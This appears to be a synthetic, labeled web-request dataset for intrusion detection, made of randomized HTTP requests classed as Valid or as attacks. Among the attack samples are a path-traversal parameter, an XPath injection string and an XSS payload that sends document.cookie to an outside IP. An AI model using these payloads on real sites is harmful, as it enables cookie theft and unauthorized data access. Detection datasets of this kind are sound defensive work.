Trailer: Accept-Language
User-Agent: pnss (3y1IDVR; w.twnL; uSfs_bXFtd; 7dzFWKN)
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: 0.3 35.86.27.8:05
Transfer-Encoding: identity
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 289 www.y4tieh.html:6480 "Sn3nNaak3avt" "Sun, 06 Sep 09 14:49:12 CET"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47779
Start - Id: 12745
class: Valid
GET /6LasEsahtootuncll/orewscarwnhTetEh/pstp2/kRem.WBTst0/argmevioneIyhe/raj3Eb@/bGreplaceFlinkandExqEw30/ecseaicnot7es2/swGBXWNusWL8x@gfsM4/7n4xseewd/tFZTUJ.pl?J13scriptDgroup bywinntDaT=3224&rrit0aB=se&2ids=MhDsb&nlaly=nnigLccunion&ceSeaoato=2943786&ondrbe=scriptotmpfdvlureid&P5=eGrcch+5u5E+r&JnodeCGx=xM8Oz6QdPQr&aXonh=ttmppc&ogenrdtnn2=ejrElobjectu5nirme&hhtm=eO+ HTTP/1.0
Host: www.tHty.cz
Connection: atmtret
Accept: */*;q=0.9
Accept-Charset: x-mac-icelandic;q=0.5, iso-8859-3;q=0.4, iso-8859-5, x-mac-hebrew;q=0.9, x-mac-cyrillic;q=0.8
Accept-Encoding: 
Accept-Language: eethaat-or
Cache-Control: only-if-cached
Client-ip: 106.56.170.223
Cookie: @t13u7Uk6=a9reh;lszr=eK2@HO5zZ0
Cookie2: $Version="599"
Date: Sat, 14 Jul 07 08:32:27 UTC
ETag: W/"20@7Eq2DSjk_tq7ZHdB"
Expect: 100-continue
From: ensecrsd@aioee828zo.fr
If-Modified-Since: Fri, 02 Dec 05 20:24:58 CET
If-Unmodified-Since: Tue, 21 Nov 06 14:33:22 GMT
If-Match: *
If-None-Match: "Dju7IgCbH-bJwiBLv_i7"
If-Range: Thu, 02 Aug 07 12:26:50 CET
Max-Forwards: 32
MIME-Version: 7.8
Pragma: CkpYaaDc='fto1lc9d'
Proxy-Authorization: stgyt iacOt=tu9k
Authorization: Digest nc=A23467be
Range: -463,865742-83,-85
Referer: http://pasago6.uk/iuprei.fgf
TE: chunked;q=0.7,trailers
Trailer: Host
User-Agent: MEro2Eaohg/6.7.5
UA-CPU: MIPS
UA-Disp: 509,294,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 596x179
Via: HTTP/0.6 108.138.234.47, HTTP/1.3 www.amt3hso.jpg:237
Transfer-Encoding: gzip
Upgrade: eooi/2.7, van/3.8, dpde/7.1, deu1tv/8.1
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 70965960984740249888
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12745
Start - Id: 36
class: Valid
GET /uKkLWLB3JzneE1/hdrrn9naecEh7t/s5slAeer/VzObbJb.nsf?7ygxPEz2wcuri=eer+ HTTP/1.1
Host: 120.39.12.228
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=85265
Client-ip: 152.17.139.140
Cookie: taddrOcxytsetD=803;ysoUeSi=94057
Cookie2: $Version="245"
Date: Sun, 17 Jul 05 01:49:41 UTC
ETag: "_l.lpI88p-tYmFKx9"
Expect: adsfev
From: T11b@lathr.st
If-Modified-Since: Mon, 24 Sep 07 08:59:49 UTC
If-Unmodified-Since: Sat, 09 Jun 07 08:45:33 UTC
If-Match: "@Af-u8gJq.Ffs@wlaS"
If-None-Match: *
If-Range: Mon, 12 May 08 04:32:53 UTC
Max-Forwards: 75
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="qbAila"
Authorization: mmujew itnl=lssehhr8
Range: -54670
Referer: /asac/srOhy/u80r9TO.jpg
TE: chunked;q=0.7,trailers
Trailer: From
User-Agent: doht/3.1
UA-CPU: PowerPC
UA-Disp: 4994,968,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2292x8708
Via: 9.3 249.7.13.238
Transfer-Encoding: mehp; tmsaf=uIecdvyf
Upgrade: ot9/1.3, re6/0.1, oEc/7.4, sPn2y/5.3, 31odqt/9.0
Warning: 217 www.elqkhr5.jpg:2 "Lrvth" 
X-Forwarded-For: 242.13.127.96
X-Serial-Number: 436492
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36
Start - Id: 45011
class: PathTransversal
GET /h0EHBKH3LIny_0ALe-/eyiV8HiwQiKHYRhWN/ehHbno4/ltMgaSx1UlG/wgo1ootottnenatnx/Vk4trx@_H/8cO@P49MQcatN/TeAmailjv/9aseaknrwleat/o-tZc_wkDf_me./Rd5Cu/sdc9dEaeI.asmx?w9kbs=95529221&o@L_H0g5MnIq=4152&Stta=0&istlthTvni=943440&eyAo7yvaint1=0&FIwSFUS=siuM8ddrn&tshoLtitnadcb3k=857335&.kutsyAPfIpG=9getsmet&ueeoojtaatSilas=uprmtgph9a1&Odyttte=0852505&pnwTumaydsuhuwe=%3Ef%7Ezicpkvesmpo%3Asock_stream&k4uleoeSd=s3pe4iioKApM&LTbgsoundmio=..%2F..%2F..%2Ftinsve%2Fadmin.txt HTTP/1.0
Host: www.eSntnh.de
Connection: close
Accept: image/gif;q=0.2, video/quicktime;q=0.6
Accept-Charset: windows-1253
Accept-Encoding: gzip;q=0.7, identity, gzip, identity;q=0.8
Accept-Language: *;q=0.7
Cache-Control: Wsnebese=fLes
Client-ip: 112.213.27.172
Cookie: fw5etbae3dimR=3180
Cookie2: $Version="75"
Date: Thu, 04 May 06 13:31:01 CET
ETag: "5XlM8rQ.XAqXjiaL"
Expect: 100-continue
From: Wmt1aod@ntoq7.ch
If-Modified-Since: Mon, 31 Aug 09 24:54:47 UTC
If-Unmodified-Since: Thu, 14 Jun 07 23:02:58 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 95
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: NTLM aXNyYWVzaHlnbnRlaWF0UTlnbGN0bXBjaWFxdHR0aTNhdDJ2cmVhc3M=
Range: 5776-008,198935-,3869-1
Referer: http://www.tUiIS.net/jninsdh/6aben.gif
TE: chunked;q=0.4,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.5 (compatible; MSIE 0.3; SunOS sun4u; afeSdMpen; rnwrihtl)
UA-CPU: StrongARM
UA-Disp: 100,251,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 569x3212
Via: 7.4 63.63.16.209, 8.8 183.140.106.250, 5.7 www.enh4.htm:0152
Transfer-Encoding: compress
Upgrade: Eubq/3.7
Warning: 749 www.asddfwek.html "e1eetnuyu" 
X-Forwarded-For: 179.111.85.226
X-Serial-Number: 018469512679602671
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45011
Start - Id: 28076
class: Valid
GET /eXYA4/8rho/i7re4rZ@HRi79H/Htirsatair/eO5/eane.cfm?twaN=%24&rphoawc=1oMa8&bnr7ozmehurl=30&yoaoc1lopeela=%2Fbaen&ny1=690&lad=ryfFmhong&m8tta9ej=16 HTTP/1.1
Host: www.yeoihiir.it
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: RCnt4i-i;q=0.8, suneets-1adereiy;q=0.3, sina-f, se-q6;q=0.1
Cache-Control: no-cache
Client-ip: 58.133.89.125
Cookie: senUw=bnao;rastuvee=sreplacel h;ten=8940106817
Cookie2: $Version="230"
Date: Sun, 06 Jan 08 20:53:10 GMT
ETag: W/"15mLDMnewx22uKeQK"
Expect: cpyS21t
From: jrEaees@crOaett9tr.fr
If-Modified-Since: Sat, 14 Jan 06 20:51:18 GMT
If-Unmodified-Since: Fri, 16 May 08 20:27:35 UTC
If-Match: "985J35kEjQaz7l1Tww"
If-None-Match: "5l42Fq1@kxAMfGz"
If-Range: Thu, 15 Jan 04 22:16:34 CET
Max-Forwards: 426
MIME-Version: 0.9
Pragma: nNejtee4='aa4i'
Proxy-Authorization: Basic cmVjaVpycjp0bml4
Authorization: Digest qop=eOdai
Range: -570
Referer: /tj7ign.pdf
TE: chunked;q=0.0,trailers
Trailer: If-None-Match
User-Agent: nee0arza
UA-CPU: MIPS
UA-Disp: 317,7772,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7806x038
Via: FTP/9.9 www.weetn.html
Transfer-Encoding: deflate
Upgrade: bdNih/1.1, xdHnh/3.6, htee/4.4, 6mIer/6.0
Warning: 099 112.213.175.175 "0t3erfhqo" 
X-Forwarded-For: 97.114.38.28
X-Serial-Number: 981815102258
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28076
Start - Id: 20958
class: Valid
GET /QFmadmin2/oaqCbX-BvEXQ.MK9AtEG/8mk0bin0d0/csaWGa/MXe_D-qSo.js?e2einamnot3io=sUUMlsbHIQYL&vDRnph-4FkF9K=33274&lBHdocumentncl-_nullf2t=o7hTc45msResurto7&eelaEeoecabet=xuerrdrnfEt+qstdin&aoernc=soil+mailhl%3Ashavingaoatuuais&oienm=%2B%27style6mn&ttswfm=hHBTc&lWhil4=0513355&tsahzpwsne=ae7nebrslcvrunl&eoyopgdsElor=4729583&vSe=asehi2zotsldex&ydt=eQD&he0aaonibRsakn=318&ethruinre=ae%25se&slcjitzs=nsbddo2Soigfsfo HTTP/1.1
Host: www.Tavj.cz:80
Connection: teyp
Accept: audio/*;q=0.5, video/*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.5, gzip;q=0.9, compress;q=0.2
Accept-Language: hd94ro-3xr0;q=0.4, mnce-del8w, anet-llo2r;q=0.5, p9apob-l;q=0.6, tEfu-5doovi;q=0.1
Cache-Control: only-if-cached
Client-ip: 95.153.52.209
Cookie: Uelrhnjanyssacn=i-;MmEiframeyxQX1N=yaEE68
Cookie2: $Version="4"
Date: Mon, 01 Mar 10 04:39:58 CET
ETag: "hes6V5xyQxH53Ap"
Expect: 100-continue
From: stnsist@ee8nh.de
If-Modified-Since: Wed, 20 May 09 02:05:56 CET
If-Unmodified-Since: Mon, 15 Dec 08 14:53:49 UTC
If-Match: "iNW4_@jvS-RDf20e5_E"
If-None-Match: "EscZyGzTEUYvTaHN"
If-Range: Wed, 24 Mar 04 24:57:45 UTC
Max-Forwards: 67
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM Ym5pbE1FeWR0THJpZXNlaHp5bzNsc29Tb2F0c3BvaFRiRXVFcklh
Authorization: Basic clR5bDpjN2xOaHNtTA==
Range: 225798-,299422-
Referer: /6mqurms/bhRo.mp3
TE: chunked;q=0.4,deflate;q=0.3
Trailer: Authorization
User-Agent: ocfeovooldRiFfcsre
UA-CPU: x86
UA-Disp: 3276,4561,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 212x4647
Via: 1.3 www.Bge0luS.html, ia4an/9.5 www.ngee9yn6.shtml
Transfer-Encoding: gzip
Upgrade: tknsdI/6.1, bao9sk/7.3, wfso/2.7, lrm/1.0
Warning: 818 39.101.24.238 "Ei4etc3nfbsi2nwj" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 175416
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20958
Start - Id: 48738
class: XPathInjection
GET /nfM@idUzFyE_/6ePUSmhY/t2XFzU/TmPUDexec_rNeWCTyN/oaanuvv4oiel/daloRto8enseythat/y_73M1L16Oq/wbdLLgmAi.gif?ha=7hR47jexecmldb&creinwNl=Ubuub&ht5ZwqfromPv=471016&B.krEEtVocd=ema%27+or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++++%27ajo%27+%3D++++%27&7gei=fetcimgformh4&DraA=n225eNlCo&heebaunoKou=156240198 HTTP/1.0
Host: www.id5t0grr.cz
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.5, gzip;q=0.9, compress;q=0.0, gzip;q=0.4
Accept-Language: i0i9-oi;q=0.2, dz8t-su8ae;q=0.7, tnhetroa-t3edr;q=0.2, u0ptm-dtoitay;q=0.2, eiwgrf-soEhE8s
Cache-Control: max-stale
Client-ip: 80.135.128.144
Cookie: atHhdoUme=Teieeamind;SorM=i;oe3otI9nMwi=105;58IGPxD5MsU=sbo;hmNslm=marr3he;rajtlsaosntaiAe=rE z
Cookie2: $Version="20"
Date: Fri, 25 Nov 05 02:23:47 UTC
ETag: W/"K9qtuGj_MBzd3YVA"
Expect: fonrex
From: wdlEt@aLnyEae.st
If-Modified-Since: Wed, 19 May 04 16:29:22 CET
If-Unmodified-Since: Sat, 25 Dec 04 24:50:32 UTC
If-Match: "HdK9ogfy1hEEZ4th3U"
If-None-Match: *
If-Range: Wed, 03 Mar 10 21:40:47 UTC
Max-Forwards: 944
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aTRhbmVjdWE6NHVkcnBJZQ==
Authorization: Digest realm
Range: 328-,-79624
Referer: http://www.dteGri.uk/Lca1a/rNIpog/lrirTE/4jirt.css
TE: deflate,gzip;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/2.0 (X11; U; Linux i386 4.1; 4t-jm; rv:6.8.9) Gecko/02332443
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: HTTP/3.7 57.8.18.65, 9oO/0.1 187.124.39.211:2
Transfer-Encoding: gzip
Upgrade: tSnw/7.9, a5m/6.7, fogi0/2.6, alEi/8.0
Warning: 669 www.nfgu.shtml "3kai" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48738
Start - Id: 32250
class: Valid
GET /3moien/cie/llsUU4/ocooittodrseiueahh/xSvnaipihOs/JpM2homerY_9fxCg/wH1qSdnBcOjs..php?seAh9Oe=kcoeexecooihttps&2vx8gsystem.V=tvtls%7Cirbtt&4diubzo5Oa=eaH%4070&a89ctoeaaxip=ce8hPvM35hH&LhEBiA9WYvF=409175460&tky90fRntooe=omM6 HTTP/1.0
Host: 231.200.30.226
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr
Accept-Encoding: gzip;q=0.6, gzip;q=0.0, gzip, deflate, compress;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 69.7.19.37
Cookie: cea='hue0passwdyydocument:e >she
Cookie2: $Version="57"
Date: Tue, 23 Jun 09 11:32:41 CET
ETag: "7TxxON3@qF_7MM7tg2F"
Expect: 100-continue
From: ajtRne@yawe.com
If-Modified-Since: Thu, 02 Sep 04 02:05:28 CET
If-Unmodified-Since: Wed, 05 Nov 08 02:37:24 UTC
If-Match: *
If-None-Match: *
If-Range: "PD7A.oqGzwFFu8mgZwO"
Max-Forwards: 6277
MIME-Version: 7.8
Pragma: 1eni=hltc0npc
Proxy-Authorization: AIrohr nh5ho5ft=elhiago
Authorization: Digest qop=auth
Range: -1,-97620,-0636
Referer: /hgsoI/czwuy.sh
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: nskqsCBG http://www.thuG.biz
UA-CPU: StrongARM
UA-Disp: 8350,6514,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2503x5889
Via: 6aica/4.0 www.sdflwru.htm, 9.7 212.101.240.215, erdice/0.2 255.142.87.153:77
Transfer-Encoding: gzip
Upgrade: fehAnr/5.2, a6eTe/9.4, heim/2.3
Warning: 330 www.en4chatr.gif "gimro07nicd5tc7s" 
X-Forwarded-For: 145.88.219.204
X-Serial-Number: 76488
----: --------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 32250
Start - Id: 26207
class: Valid
GET /j79CzYCA7JbwY/QGKYbodyAzZ/iQCIjzrg72/himcawbAeh/hG/4Esr/r4HVbngeNKn1WvW63aF/a@GPAK/6hrWaj1eNhh/re1asholynhpasX/AelibsIwrbiibsdwsmf/imecn.dll?t8eay7=74375488&4L_7.RNmailxNEp=5&xiieuouaf2d4r=eoepei&e4otR=lhhome%40openg%3Ag%26y&saie6fiiT2t=yoHee+Roes&oi=anaJ8NQ0oe_E&g@aTek9location=491&utooeUvH=htn3a%5Dr&6AirehoeB=541556671&vrwgouy=j&es3ybrkjeani=9&hssNdcunso5y2n4=959221209&nadbtstdesz=8549371 HTTP/1.1
Host: 9.135.28.3
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-1253;q=0.4, windows-1251;q=0.5, windows-1251;q=0.2, x-mac-greek
Accept-Encoding: gzip;q=0.0
Accept-Language: tr-ctnee;q=0.8, tZdvae2s-rpl;q=0.6, 8oofneo-trueokto;q=0.3, d-sreS
Cache-Control: rbAddc=kwae7lt
Client-ip: 0.7.191.218
Cookie: B8H22DOoptwVj=73462249;doAyc3naa=3;nt=bifvartmoaijxusrt;0hEdnr=9;ABVChtehH76e=<n]f&
Cookie2: $Version="79"
Date: Wed, 22 Dec 04 20:47:55 CET
ETag: "8XYa4ik.O@TvKv9X.8C1"
Expect: ehesa=a1i8;ntNcerax
From: aepax@hknn.be
If-Modified-Since: Sun, 12 Apr 09 09:16:36 GMT
If-Unmodified-Since: Sun, 10 Feb 08 03:41:29 UTC
If-Match: "YGD_i4QaJbNqqb-dj9ad"
If-None-Match: "HAlo7rawVTP.uMvEe"
If-Range: Sun, 17 Oct 04 12:31:50 GMT
Max-Forwards: 44
MIME-Version: 2.8
Pragma: iu='txnds1s'
Proxy-Authorization: Basic ZWljdW06aDdkSW8=
Authorization: eataui apuF=l9oXm
Range: 485874-76550,627253-,688763-0608
Referer: http://www.dthnc.fr/rtte/AgsnH1co/easael/biesi.gz
TE: chunked;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/0.4 (compatible; MSIE 1.9; Linux i386; wuUddTtiC)
UA-CPU: PowerPC
UA-Disp: 1270,703,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 733x086
Via: 6.1 67.73.27.212, 8.8 www.YdhealS.gif, HTTP/6.6 www.Oeiutu.html
Transfer-Encoding: identity
Upgrade: Ugc/5.5, os3ld/5.5
Warning: 403 www.1ernaeea.tiff "sB1ntt" "Thu, 29 Jan 04 19:12:54 UTC"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 2106773576
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26207
Start - Id: 25900
class: Valid
GET /Kg4L6W0@samwinnt/wYNoo19wH/u7h/eVGtTgned/4acceptXQoO9/lPJYzak6mKPhpK5/nyetoaNKt.asmx?carH6imc=svQi&nssaiopt=%3BsS&etsia6o3=%5DArt&stylez1V=me37hhtaccesf&BZm4dw-ykGX=332717&6eentu6weo0n=etnsei3ehkl0rm&msnDmkiu6tmsS=943311&oTecYaeib=360477&rC=inoInhhde HTTP/1.0
Host: www.7ki6L.com:8165
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: i-r, tnRNecn-eucn5b;q=0.9
Cache-Control: max-age=242
Client-ip: 202.169.172.83
Cookie: Thttpg5tj=7;bzDJQwhereEP=|ecopy;e1=00635
Cookie2: $Version="3"
Date: Tue, 28 Mar 06 01:05:05 GMT
ETag: W/"UIH.s-9vi3sBuXJ.GJ7-"
Expect: xiTecej=s1gaek;sexe2ms
From: 0tac@3snhtda7el.st
If-Modified-Since: Sat, 25 Nov 06 07:06:58 UTC
If-Unmodified-Since: Thu, 22 Mar 07 12:04:37 UTC
If-Match: "q2Dx-CA2QHYFajKy"
If-None-Match: "dnYQ6g95F@eHfN@zsok"
If-Range: Tue, 16 Jan 07 10:29:11 CET
Max-Forwards: 30
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM dHN0ZXNvbmVpdGhzbWxhanJsSHBhZHBlbWhvaXdRdm9sMHNhYw==
Authorization: ums1e xNri=ehoa
Range: 112-242,-6,0-
Referer: http://jeoaAi.de/te4no/frng.asmx
TE: gzip,trailers,chunked;q=0.2
Trailer: Cache-Control
User-Agent: Mozilla/2.0 (Windows; U; Win98 5.0; we-db; rv:7.1.9) Gecko/28031011
UA-CPU: x86
UA-Disp: 291,6267,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 069x973
Via: nSo/6.5 www.ostsf7Ir.gif, 1.0 199.36.224.145, 7.8 www.cfiu.jpg
Transfer-Encoding: deflate
Upgrade: v4b/9.4, idShiq/5.7, hdmhO/3.7
Warning: 862 254.139.199.159 "hnptOgFo1IjtwesaTav" 
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25900
Start - Id: 48052
class: XSS
GET /1yB_jEMX2SNrUP/asVJkUu7-v76Vxi/rl2hqa2eicjt9eFrg/i3png/oipeeeaI4on5lb/unduececOkieq49vq1wt/o2tx/smEdakSVbzAQpHkR/qSdosF-5WaSiEfvaq7.cgi?idE0no=%3Cdiv+++++onmouseover++%3D+%22+%5Bwindow.open%28%27http%3A%2F%2F29.249.236.215%2Felngma.asp%27%2Bdocument.cookie%29%3B%5D+%22++%3E&ernteLilrs=56875&documentexecgMc=tOBjKFe.&odJanomv=5ELSsNDQS7bt HTTP/1.0
Host: www.sscltlt.cz:3437
Connection: keep-alive
Accept: audio/*;q=0.5, application/*, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: n-gaI;q=0.8
Cache-Control: max-age=8194
Client-ip: 252.198.126.142
Cookie: sleiecTm3d=2015722541;raiia=teiteoa;tgtutls=mpBNpohavctsos
Cookie2: $Version="1"
Date: Tue, 28 Dec 04 09:58:22 UTC
ETag: W/"5idIiZDDxiFZrFkOv"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: agsv@hn76ev.st
If-Modified-Since: Fri, 19 Jun 09 11:15:13 UTC
If-Unmodified-Since: Sun, 05 Jun 05 21:32:00 GMT
If-Match: "5-WC9.pKi3PmZ_j"
If-None-Match: *
If-Range: Wed, 26 Mar 08 20:16:03 GMT
Max-Forwards: 810
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: eofH ewreea=Anton
Authorization: nrsO grats=oecceisw
Range: 16-601
Referer: http://repgsm.cz/mnRetk.png
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 6.3; lt-nt; rv:6.2.8) Gecko/62965199
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6153x685
Via: 1.0 www.wreqh.htm, FTP/7.4 www.dj80.js
Transfer-Encoding: identity
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 142.37.94.150
X-Serial-Number: 405569074263988888
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48052
Start - Id: 27297
class: Valid
GET /A5RmKzgBu/htwgetmelXBuog_n/aivE7nlhKD@-xkY/sorngoc/VgRO/omsm/Ayr.gif?ae5i1ei3t1mkd=htinh+&aed6yyd=trt HTTP/1.1
Host: 37.78.206.193:8
Connection: diEtalU
Accept: */*;q=0.7
Accept-Charset: iso-2022-kr;q=0.1, x-mac-greek, ks_c_5601-1987;q=0.0, gb2312, utf-8
Accept-Encoding: *
Accept-Language: ws-srz, nc-dal1, 5n7eeea-damtgs, mmmot-doh;q=0.6, olu-4sdicwtv;q=0.7
Cache-Control: no-cache
Client-ip: 191.18.69.14
Cookie: 9wzanzCb=0693369;oorHu4Sr=3;taaesynooVso=?Llsfp;ncl9Too=ya;5tj6eaka=mi+
Cookie2: $Version="63"
Date: Fri, 16 Feb 07 24:44:17 CET
ETag: W/"dZdeLIIail_Zlt0UZ"
Expect: 100-continue
From: hsnao@fNsit8t.org
If-Modified-Since: Tue, 09 Jan 07 03:05:46 CET
If-Unmodified-Since: Wed, 21 May 08 24:09:13 CET
If-Match: "zdv.cLHsyxs-6@LqDf"
If-None-Match: "B6IGT04sxI6fCRoC1-P."
If-Range: Fri, 31 Aug 07 01:07:26 GMT
Max-Forwards: 830
MIME-Version: 8.0
Pragma: emn6Sbe='nNtt'
Proxy-Authorization: NTLM cGxzckZBc2JjYXVDYTljMXNldXJhaXU1cnl0aGluYmVzY1J0ZHNwc24=
Authorization: Digest cnonce="yrmhni"
Range: 532934-,42-
Referer: http://lsOirS.com/e6cN9ee/aOIudrh.asp
TE: chunked,trailers,trailers
Trailer: Via
User-Agent: Mozilla/3.8 (Machintosh; U; PPC 3.1; g1-e3; rv:0.9.6) Gecko/88264293
UA-CPU: 68000
UA-Disp: 3109,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6912x6352
Via: 2.0 224.232.11.39
Transfer-Encoding: gzip
Upgrade: pos/2.6
Warning: 650 139.231.175.172 "eiohyeeedPe" 
X-Forwarded-For: 202.99.49.239
X-Serial-Number: 75164077038098175
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27297
Start - Id: 9254
class: Valid
GET /zx/ear1vZsSp/esi.kaTuvaUgg/i9/rnen3q8u2nhoxr/aeyoza.cfm?nfrmeama=hTLdQrw&mghm=620750&oi=4&llAihhna=%3Dn&meo=ts%28siframe%5CDmn%29+achhmailo&SU-G=edlnnh&gwxai=02&wckrGlnneteuhE7=198046&fsd7if3e4foiMsc=eb&qdtcdLhtl=9181&e6iiwimyrEnTMbi=nn%3Cutueeincludedlyp8 HTTP/1.0
Host: www.gtnu.cz:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-2;q=0.9, iso-8859-8, iso-8859-9, iso-8859-2, iso-2022-kr
Accept-Encoding: compress;q=0.7, identity;q=0.4, gzip;q=0.6, gzip, identity;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 62.16.5.45
Cookie: 6slremf=9423;nmlntt3HtDsfi=3918007;ujlhonit==msr
Cookie2: $Version="9"
Date: Sun, 05 Aug 07 22:55:05 UTC
ETag: "lC2c3zVTXTW@QzaDI"
Expect: 100-continue
From: odmn5jk@dalmleb.ch
If-Modified-Since: Wed, 27 Jan 10 10:56:55 GMT
If-Unmodified-Since: Wed, 19 Jan 05 19:42:28 GMT
If-Match: "qHF3GXO3u@20RzmxXizt"
If-None-Match: "c9sSKLWRpw@w67Nq"
If-Range: "fqq.diJvV7hhYI3dQXqJ"
Max-Forwards: 762
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest response="eD54246448cECD9cDDA0d3e85fccEfc0"
Authorization: Basic bnlpRUh0cnA6YWFzdGMw
Range: 30-703,-64,-521
Referer: /talaaib/row8hu5a/ee8ua3rh/bt9sroee.php
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.6 (compatible; Konqueror/3.4; Linux i386; kognhs6eEt; aespcoqo; omnqeoiftt)
UA-CPU: Sparc
UA-Disp: 2373,285,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 476x394
Via: FTP/2.3 www.eeh0ptia.gif:9, HTTP/4.7 118.57.133.179
Transfer-Encoding: deflate
Upgrade: dOaas/3.7
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 6361501789
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 9254
Start - Id: 5391
class: Valid
POST /iJS72zwS/umxOaw9DVnDV3RNfBX/tX6oJ8/rV4o..tiff? HTTP/1.0
Content-Length: 42
Content-Language: 9sxzep,wjaddys,nwar
Content-Encoding: compress
Content-Location: http://www.fo57Sr.org/tore1/ta6lta4/ntlr.jsp
Content-MD5: a3JobGN0dGVlaWVvcHUwRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Dec 04 10:35:07 CET
Last-Modified: Sun, 28 Jun 09 08:06:23 CET
Host: www.iaepko.com
Connection: keep-alive
Accept: application/postscript, image/gif
Accept-Charset: x-mac-arabic, iso-8859-4;q=0.8, x-mac-arabic;q=0.6
Accept-Encoding: gzip;q=0.8, deflate;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 49.138.242.29
Cookie: jt=IOe(
Cookie2: $Version="9"
Date: Mon, 08 Mar 04 01:11:16 CET
ETag: "CwpH02W93_.9WkBHrQ7"
Expect: 100-continue
From: heif@92m3ed.fr
If-Modified-Since: Sat, 26 Jul 08 09:43:37 UTC
If-Unmodified-Since: Fri, 27 May 05 23:34:02 CET
If-Match: "m2I02FM25vY38.adqo2"
If-None-Match: "BRj8BC3FWUbxzAqz6"
If-Range: Thu, 20 Oct 05 07:16:42 GMT
Max-Forwards: 499
MIME-Version: 9.2
Pragma: h3ircA='mv'
Proxy-Authorization: Basic bWNlZUdjOm5nY2k0dGhh
Authorization: NTLM ZG5uZ01SdmF1cm91bzYybmpPb3RlbHlubGRjMmdlc2NoZHJhaWVpdGM=
Range: 18375-6599,-64,09092-
Referer: /iq0e/itLtel/tasVttb/jmn8.fgf
TE: trailers,deflate
Trailer: Expect
User-Agent: lIneqFctEisStl0b
